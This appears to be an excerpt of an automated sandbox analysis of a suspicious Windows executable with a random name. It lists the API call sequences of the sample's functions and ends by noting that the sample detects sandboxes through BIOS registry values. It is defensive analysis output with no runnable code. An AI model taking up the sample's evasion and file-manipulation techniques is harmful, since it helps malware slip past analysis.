Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,27_2_00B03F50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,29_2_012B6CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,29_2_012A1170
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,29_2_012AD970
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,StrStrIA,29_2_012C2B40
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,29_2_012C2BB0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetUserNameA,memset,StrStrIA,29_2_012BADE0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,29_2_012C25C0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,29_2_012C1460
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,29_2_012C3CE0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,29_2_012B5720
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,29_2_012C3F50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,29_2_012A7FD0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,29_2_012A3610
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,29_2_012BCE10
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,29_2_012A1660
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,29_2_012C1690
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,31_2_01126CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,31_2_01111170
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,31_2_0111D970
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,StrStrIA,31_2_01132B40
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,31_2_01132BB0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,31_2_011325C0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetUserNameA,memset,StrStrIA,31_2_0112ADE0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,31_2_01131460
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,31_2_01133CE0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,31_2_01125720
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,31_2_01133F50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,31_2_01117FD0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,31_2_01113610
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,31_2_0112CE10
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,31_2_01111660
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,31_2_01131690
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,33_2_01306CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,VirtualQuery,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,33_2_012F1170
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,33_2_012FD970
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,StrStrIA,33_2_01312B40
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,33_2_01312BB0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetUserNameA,memset,StrStrIA,33_2_0130ADE0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,33_2_013125C0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,33_2_01311460
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,33_2_01313CE0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,33_2_01305720
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,33_2_01313F50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,33_2_012F7FD0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,33_2_0130CE10
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,33_2_012F3610
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,33_2_012F1660
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,33_2_01311690
Contains functionality to detect sandboxes (registry SystemBiosVersion/Date)
